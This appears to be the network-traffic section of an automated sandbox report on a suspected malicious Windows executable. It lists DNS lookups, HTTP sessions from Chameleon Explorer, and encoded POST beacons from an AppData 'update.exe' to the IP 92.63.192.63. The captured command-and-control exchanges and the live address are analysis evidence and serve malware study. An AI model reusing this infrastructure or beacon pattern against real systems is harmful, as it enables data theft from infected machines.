                                                                                                          Jan 2, 2025 02:28:18.359316111 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.478903055 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.478919983 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.478957891 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.478974104 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.479036093 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.479523897 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.599812031 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.599841118 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.604671001 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.604696989 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.604712009 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.604752064 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.604760885 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.604794979 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.818167925 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.818238020 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.818406105 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.818494081 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.818547964 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.819257021 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.823278904 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.824054956 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.824120045 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.824256897 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.829032898 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514457941 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514566898 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.514727116 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514739037 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514755011 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514765024 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514772892 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.514776945 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514789104 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514791965 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.514823914 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.514863968 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514875889 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514887094 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.514904976 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.514946938 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.519337893 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.519399881 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.519407988 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.519459009 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.519510984 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.519557953 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.640232086 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.640244007 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.640250921 CET804986692.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:19.640309095 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:19.640343904 CET4986680192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:20.260258913 CET4986680192.168.2.492.63.192.63
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 2, 2025 02:27:05.615962982 CET4993953192.168.2.41.1.1.1
                                                                                                          Jan 2, 2025 02:27:05.636497021 CET53499391.1.1.1192.168.2.4
                                                                                                          Jan 2, 2025 02:27:07.366533041 CET5387353192.168.2.41.1.1.1
                                                                                                          Jan 2, 2025 02:27:07.401484013 CET53538731.1.1.1192.168.2.4
                                                                                                          Jan 2, 2025 02:27:09.960901976 CET6055153192.168.2.41.1.1.1
                                                                                                          Jan 2, 2025 02:27:09.983918905 CET53605511.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 2, 2025 02:27:05.615962982 CET192.168.2.41.1.1.10x8a85Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:07.366533041 CET192.168.2.41.1.1.10xa2b1Standard query (0)www.chameleon-managers.comA (IP address)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:09.960901976 CET192.168.2.41.1.1.10x924aStandard query (0)neosoft-activator.appspot.comA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 2, 2025 02:27:05.636497021 CET1.1.1.1192.168.2.40x8a85No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:05.636497021 CET1.1.1.1192.168.2.40x8a85No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:07.401484013 CET1.1.1.1192.168.2.40xa2b1No error (0)www.chameleon-managers.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:07.401484013 CET1.1.1.1192.168.2.40xa2b1No error (0)ghs.googlehosted.com142.250.185.115A (IP address)IN (0x0001)false
                                                                                                          Jan 2, 2025 02:27:09.983918905 CET1.1.1.1192.168.2.40x924aNo error (0)neosoft-activator.appspot.com172.217.16.212A (IP address)IN (0x0001)false
                                                                                                          • 2no.co
                                                                                                          • neosoft-activator.appspot.com
                                                                                                          • www.chameleon-managers.com
                                                                                                          • 92.63.192.63
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449731142.250.185.115803848C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 2, 2025 02:27:07.413440943 CET216OUTGET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
                                                                                                          User-Agent: Chameleon Static (Ver: 3.0.0.505)
                                                                                                          Host: www.chameleon-managers.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Jan 2, 2025 02:27:08.737328053 CET401INHTTP/1.1 200 OK
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Cache-Control: no-cache
                                                                                                          Set-Cookie: cham_uid=5153dce68ee7dc529e3ee1aac6d1b34a; expires=Fri, 02-Jan-2026 01:27:08 GMT; Path=/
                                                                                                          X-Cloud-Trace-Context: 8346c0596dd5ff8e90c2751fa595580a;o=1
                                                                                                          Date: Thu, 02 Jan 2025 01:27:08 GMT
                                                                                                          Server: Google Frontend
                                                                                                          Content-Length: 32
                                                                                                          Expires: Thu, 02 Jan 2025 01:27:08 GMT
                                                                                                          Data Raw: 35 31 35 33 64 63 65 36 38 65 65 37 64 63 35 32 39 65 33 65 65 31 61 61 63 36 64 31 62 33 34 61
                                                                                                          Data Ascii: 5153dce68ee7dc529e3ee1aac6d1b34a
                                                                                                          Jan 2, 2025 02:27:08.737344980 CET401INHTTP/1.1 200 OK
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Cache-Control: no-cache
                                                                                                          Set-Cookie: cham_uid=5153dce68ee7dc529e3ee1aac6d1b34a; expires=Fri, 02-Jan-2026 01:27:08 GMT; Path=/
                                                                                                          X-Cloud-Trace-Context: 8346c0596dd5ff8e90c2751fa595580a;o=1
                                                                                                          Date: Thu, 02 Jan 2025 01:27:08 GMT
                                                                                                          Server: Google Frontend
                                                                                                          Content-Length: 32
                                                                                                          Expires: Thu, 02 Jan 2025 01:27:08 GMT
                                                                                                          Data Raw: 35 31 35 33 64 63 65 36 38 65 65 37 64 63 35 32 39 65 33 65 65 31 61 61 63 36 64 31 62 33 34 61
                                                                                                          Data Ascii: 5153dce68ee7dc529e3ee1aac6d1b34a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449739142.250.185.115804364C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 2, 2025 02:27:31.735615015 CET164OUTGET /info/versions/ HTTP/1.1
                                                                                                          User-Agent: Chameleon checker ( Ver: 3.0.0.505)
                                                                                                          Host: www.chameleon-managers.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Jan 2, 2025 02:27:32.531635046 CET840INHTTP/1.1 200 OK
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Cache-Control: no-cache
                                                                                                          Set-Cookie: cham_uid=9e088b8f013dd543cfee9c31a7018509; expires=Fri, 02-Jan-2026 01:27:32 GMT; Path=/
                                                                                                          X-Cloud-Trace-Context: 5794fb2dd1ba846045c4cc74f179df7d;o=1
                                                                                                          Date: Thu, 02 Jan 2025 01:27:32 GMT
                                                                                                          Server: Google Frontend
                                                                                                          Content-Length: 470
                                                                                                          Expires: Thu, 02 Jan 2025 01:27:32 GMT
                                                                                                          Data Raw: 3c 3f 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 5f 64 61 64 61 67 6f 6f 3d 22 33 2e 32 2e 30 2e 37 31 32 22 3b 0a 24 73 74 61 72 74 75 70 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 73 74 61 72 74 75 70 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 39 31 34 22 3b 0a 24 77 69 6e 64 6f 77 5f 66 75 6c 6c 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 77 69 6e 64 6f 77 5f 62 65 74 61 5f 76 65 72 3d 22 32 2e 32 2e 30 2e 34 32 38 22 3b 0a 24 74 61 73 6b 5f 66 75 6c 6c 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 74 61 73 6b 5f 62 65 74 61 5f 76 65 72 3d 22 34 2e 30 2e 30 2e 37 38 32 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 66 75 6c 6c 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 65 78 70 6c 6f 72 65 72 5f 62 65 74 61 5f 76 65 72 3d 22 33 2e 30 2e 30 2e 35 30 30 22 3b 0a 24 76 6f 6c 75 6d 65 5f 66 75 6c 6c 5f 76 65 72 3d 22 31 2e 30 2e 30 2e 31 33 32 22 3b 0a 24 76 6f 6c 75 6d 65 5f 62 65 74 61 5f 76 65 72 3d 22 31 2e 30 2e 30 2e [TRUNCATED]
                                                                                                          Data Ascii: <?$startup_full_ver_dadagoo="3.2.0.712";$startup_full_ver="4.0.0.914";$startup_beta_ver="4.0.0.914";$window_full_ver="2.2.0.428";$window_beta_ver="2.2.0.428";$task_full_ver="4.0.0.782";$task_beta_ver="4.0.0.782";$explorer_full_ver="3.0.0.500";$explorer_beta_ver="3.0.0.500";$volume_full_ver="1.0.0.132";$volume_beta_ver="1.0.0.132";$shutdown_full_ver="1.2.2.40";$shutdown_beta_ver="1.2.2.40";$folder_full_ver="2.0.10.400";$folder_beta_ver="2.0.10.400";?>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.44985492.63.192.63806332C:\Users\user\AppData\Roaming\update.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 2, 2025 02:28:16.939749956 CET266OUTPOST /index.php HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                          Host: 92.63.192.63
                                                                                                          Content-Length: 107
                                                                                                          Cache-Control: no-cache
                                                                                                          Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b
                                                                                                          Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9LN>2><>=>2?N(9L/:/:/9/5H?N>3>?>>>9>8O/:K
                                                                                                          Jan 2, 2025 02:28:17.624355078 CET345INHTTP/1.1 302 Moved Temporarily
                                                                                                          Server: nginx/1.20.2
                                                                                                          Date: Thu, 02 Jan 2025 01:28:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 145
                                                                                                          Connection: close
                                                                                                          Location: http://92.63.192.63/index.html
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.44985892.63.192.63806332C:\Users\user\AppData\Roaming\update.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 2, 2025 02:28:17.630192041 CET162OUTGET /index.html HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                          Host: 92.63.192.63
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 2, 2025 02:28:18.354083061 CET241INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.2
                                                                                                          Date: Thu, 02 Jan 2025 01:28:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 15793
                                                                                                          Last-Modified: Wed, 19 Jan 2022 11:10:18 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "61e7f19a-3db1"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Jan 2, 2025 02:28:18.354199886 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22
                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
                                                                                                          Jan 2, 2025 02:28:18.354211092 CET1236INData Raw: 43 4e 44 51 77 52 6b 4e 45 52 6a 45 78 52 54 5a 42 52 6a 55 31 4f 45 5a 42 4d 6b 4a 47 51 30 45 32 52 6a 49 30 49 6a 34 67 50 48 68 74 63 45 31 4e 4f 6b 52 6c 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62
                                                                                                          Data Ascii: CNDQwRkNERjExRTZBRjU1OEZBMkJGQ0E2RjI0Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3
                                                                                                          Jan 2, 2025 02:28:18.354227066 CET448INData Raw: 37 44 43 6f 61 68 47 37 30 6a 45 53 77 64 30 6e 52 4f 42 45 66 38 39 41 65 52 50 74 71 4a 49 6f 47 49 65 30 4e 62 6b 7a 37 62 4a 30 71 57 54 6a 53 34 4c 4f 52 7a 45 6c 5a 51 67 4d 6b 66 50 77 72 73 65 67 55 4c 61 53 53 4c 48 42 6d 41 59 38 36 32
                                                                                                          Data Ascii: 7DCoahG70jESwd0nROBEf89AeRPtqJIoGIe0Nbkz7bJ0qWTjS4LORzElZQgMkfPwrsegULaSSLHBmAY862upET1q5LZOiQfgC+jvOMVo6gUE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwY
                                                                                                          Jan 2, 2025 02:28:18.354345083 CET1236INData Raw: 4f 51 37 51 7a 76 4d 41 39 32 70 71 47 79 44 31 75 55 49 52 37 64 58 31 4f 59 58 38 45 34 7a 76 55 6d 52 34 6b 68 37 4a 78 55 42 45 43 47 77 69 78 53 36 4c 4a 36 51 68 39 5a 4b 37 71 45 67 48 78 31 6a 6e 79 48 6a 48 64 74 70 71 65 2f 32 38 55 66
                                                                                                          Data Ascii: OQ7QzvMA92pqGyD1uUIR7dX1OYX8E4zvUmR4kh7JxUBECGwixS6LJ6Qh9ZK7qEgHx1jnyHjHdtpqe/28UfBD3cmAeKVbhhIgFRkr0sDqlYFkhyrxRZuwjzgDf3LGgZxV5EdIrSUoTEl8bmwTXW0Xifrc9Q1c1OX5zoPIzQ6ou5jRVV7yX43eclynGs7aWaxJmd4MCUE072v9Wmn3EwnxcSfcbK7Nnnf/khv/qgsdgVdnAmCng+f
                                                                                                          Jan 2, 2025 02:28:18.354357958 CET1236INData Raw: 73 4c 4e 4a 61 64 69 6a 6d 2b 55 54 49 4d 67 39 37 78 72 64 4a 2f 76 6f 67 49 7a 32 56 4b 61 6e 4a 5a 59 73 4f 43 79 75 54 34 45 32 42 4f 78 42 77 6e 5a 49 34 44 46 38 67 4a 6c 45 4e 39 4b 75 73 6f 6c 73 4c 32 30 48 53 33 53 67 54 56 6e 31 6a 77
                                                                                                          Data Ascii: sLNJadijm+UTIMg97xrdJ/vogIz2VKanJZYsOCyuT4E2BOxBwnZI4DF8gJlEN9KusolsL20HS3SgTVn1jw4cFPvPzsnWasQLzviAFnVBMzyDZX1aFQtfxkoE+T3eA7npbeGbRdDURgvhjRaQlxXMo6+G+lnhgf7RtItyby+gi3ZJS2IKaogYbY2pSgXkMinTcXHFC5D7Vw4HxFH17eIhsnWY8kfJ7u0d2hj+f8nt7CQk1g1yP53
                                                                                                          Jan 2, 2025 02:28:18.354367971 CET1236INData Raw: 63 7a 4c 77 49 63 41 61 39 31 51 68 46 57 52 55 34 43 4e 5a 75 4f 4a 4d 43 59 54 70 5a 38 4a 72 41 68 46 64 5a 58 49 65 44 48 46 77 44 4b 6a 43 71 36 37 4c 55 59 74 55 67 2b 47 62 5a 63 4b 56 75 53 7a 58 6f 2b 31 44 4d 49 33 63 38 47 6b 63 38 43
                                                                                                          Data Ascii: czLwIcAa91QhFWRU4CNZuOJMCYTpZ8JrAhFdZXIeDHFwDKjCq67LUYtUg+GbZcKVuSzXo+1DMI3c8Gkc8CtWMeCXHfqWkCBwFONfj+e8Efkbvr3iyDlrhk6Js6OPrGb+/PGChmYTGhxmYAPl83wTh+epIaOhapX+rfFmrv2Nm5nK7lg9eFopqI7hQliPKbLOnZj8v4uPgom/+mJWNWqY55Sgw+praOMsZ12VIbw/3hi6uw5p8Fr
                                                                                                          Jan 2, 2025 02:28:18.354384899 CET1236INData Raw: 53 66 6a 6c 51 38 53 59 6f 43 74 32 79 34 58 33 47 78 6e 49 4c 47 38 39 58 31 47 67 75 2f 6f 64 6f 4d 77 30 51 55 4b 31 73 42 75 38 45 76 42 4f 56 2f 6f 33 2b 30 2b 31 5a 4e 51 77 77 39 44 36 65 30 41 30 6c 53 6c 69 70 42 4a 6e 4a 6b 55 6e 67 73
                                                                                                          Data Ascii: SfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQww9D6e0A0lSlipBJnJkUngsCKkGzp/bNySclk1Xm+qrlis2QdHgdFNWTUIXPt0O5MLkngvcMg8D6mNU/9ygWoTjbWsSOXdL5wWbcpC9aIoG6nAkjzCqLKR+HBuHylDpluJaZqbZXo72SNGWNro3MLzVvj4jOfMvqi5KkuYuS4uS3GocKC3wbkgRa
                                                                                                          Jan 2, 2025 02:28:18.354397058 CET1236INData Raw: 50 6b 7a 72 49 41 73 61 39 39 38 6d 43 6e 43 63 4c 46 4f 65 35 38 7a 37 47 58 47 53 68 61 62 4b 65 50 34 59 35 4c 71 71 32 47 51 58 2f 62 38 33 55 6c 31 55 4c 6b 43 67 62 2b 62 41 2b 34 2f 64 76 44 6e 67 75 75 45 32 69 4e 39 75 59 4c 77 69 41 74
                                                                                                          Data Ascii: PkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NUnKDYklspQQRo7QbL7xJCvEYIzPgQm2sAYY2jwGgWqwbn+WTK8srF1z6lAEJQnY85vwl/Xsj8znSZdR7ajSm+y2FdmJ5BuTR17hAfKfocJQXncIy9CGtuEMHhomzkx+XJYd
                                                                                                          Jan 2, 2025 02:28:18.354413033 CET1120INData Raw: 62 30 2f 77 70 51 4b 2b 62 5a 68 39 35 72 52 6f 74 63 50 62 32 4d 43 6c 73 39 37 42 73 6f 57 5a 68 76 56 42 41 45 64 34 42 48 37 73 79 64 54 63 56 61 2f 6d 78 70 62 6b 62 4c 75 54 54 6a 4e 63 68 2f 4b 53 32 46 45 4c 67 70 48 67 70 6d 31 59 4e 7a
                                                                                                          Data Ascii: b0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxmr93PePLKFUqkhQzFll4ZgguVKJsfIJHMn6fCoxWaT5Tx6rBeTZtDoG6B9dEoi9KUb6TBYGU0g+/ZY
                                                                                                          Jan 2, 2025 02:28:18.359052896 CET1236INData Raw: 43 34 69 5a 53 37 66 47 6b 57 76 6b 6f 68 6d 64 71 57 7a 56 61 59 51 57 54 73 73 46 6c 65 52 32 67 65 43 79 70 75 76 49 4a 46 59 49 39 55 66 48 47 52 4e 4c 36 58 38 38 6b 64 45 2f 4e 38 54 76 4f 79 34 48 48 30 4c 35 52 38 46 35 62 6b 37 69 68 47
                                                                                                          Data Ascii: C4iZS7fGkWvkohmdqWzVaYQWTssFleR2geCypuvIJFYI9UfHGRNL6X88kdE/N8TvOy4HH0L5R8F5bk7ihGQf26u6MNF3HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxr
                                                                                                          Jan 2, 2025 02:28:18.599812031 CET160OUTPOST /index.php HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                          Host: 92.63.192.63
                                                                                                          Content-Length: 6077
                                                                                                          Cache-Control: no-cache
                                                                                                          Jan 2, 2025 02:28:18.818167925 CET345INHTTP/1.1 302 Moved Temporarily
                                                                                                          Server: nginx/1.20.2
                                                                                                          Date: Thu, 02 Jan 2025 01:28:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 145
                                                                                                          Connection: close
                                                                                                          Location: http://92.63.192.63/index.html
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.44986692.63.192.63806332C:\Users\user\AppData\Roaming\update.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 2, 2025 02:28:18.824256897 CET162OUTGET /index.html HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                          Host: 92.63.192.63
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 2, 2025 02:28:19.514457941 CET241INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.20.2
                                                                                                          Date: Thu, 02 Jan 2025 01:28:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 15793
                                                                                                          Last-Modified: Wed, 19 Jan 2022 11:10:18 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "61e7f19a-3db1"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Jan 2, 2025 02:28:19.514727116 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22
                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
                                                                                                          Jan 2, 2025 02:28:19.514739037 CET1236INData Raw: 43 4e 44 51 77 52 6b 4e 45 52 6a 45 78 52 54 5a 42 52 6a 55 31 4f 45 5a 42 4d 6b 4a 47 51 30 45 32 52 6a 49 30 49 6a 34 67 50 48 68 74 63 45 31 4e 4f 6b 52 6c 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62
                                                                                                          Data Ascii: CNDQwRkNERjExRTZBRjU1OEZBMkJGQ0E2RjI0Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3
